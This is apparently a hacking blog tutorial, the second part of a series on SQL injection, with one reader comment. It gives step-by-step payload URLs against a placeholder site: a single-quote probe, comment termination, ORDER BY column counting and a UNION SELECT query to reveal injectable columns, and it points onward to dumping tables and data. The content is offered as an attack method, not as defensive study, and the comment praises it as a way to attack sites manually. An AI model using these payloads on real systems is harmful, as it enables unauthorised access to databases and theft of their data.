After Reading my First Tutorial on Basics Of SQL Injection Here is Next Tutorial .
SQL Injection- Basics Of SQLi Part-2 By RAi Jee
Mostly When we are Injection a Site we Just Check if It Gives MySQL Error or not as in Shown this Picture.
But In Some Cases we injecting a site and add single Quote " ' " to check Vulnerability and execute URL. For Example,http://www.fakesite.com/detail.php?id=1'
We didn't Get Any Error But if we Notice there are small Changes in Page .For Example.
Here is the Normal Page of our Target Site.
http://www.fakesite.com/detail.php?id=1
http://www.fakesite.com/detail.php?id=1'
After Adding Single Quote " ' " it doesnt give any kind Of Error But If We Notice The Webpage There Are Some Changes In Page and Some Content is missing.
First Tutorial SQL Injection- Basics Of SQLi Part-1
http://www.fakesite.com/detail.php?id=1--
Page Normally Loaded.
Use Order By To Check Total Number of Columns .
http://www.fakesite.com/detail.php?id=1 order by 1--
Page Normally Loaded.
http://www.fakesite.com/detail.php?id=1 order by 3--
Again Page Normally Loaded.
http://www.fakesite.com/detail.php?id=1 order by 5--
And Here We Get some Data missing From Page As Shown In The Above Picture.
Decrease our Columns Count from 5 to 4.
http://www.fakesite.com/detail.php?id=1 order by 4--
Web Page Loaded Normally here It Means Their Are 4 Total Number Of Columns.
now We have To Prepare Our UNION BASED command.
http://www.fakesite.com/detail.php?id=1 and 0 Union select 1,2,3,4--
And After executing The Query You Can see the Vulnerable Columns Printed on the Web Page.
So For Further injecting like Getting Tables and Columns then Dumping Data .You can READ this Tutorial.
UNION BASED SQL INJECTION
Author : Rai Muzammal Hussain a.k.a RAi Jee
Nice article,
ReplyDeleteGreat way to insert sql injection attack manually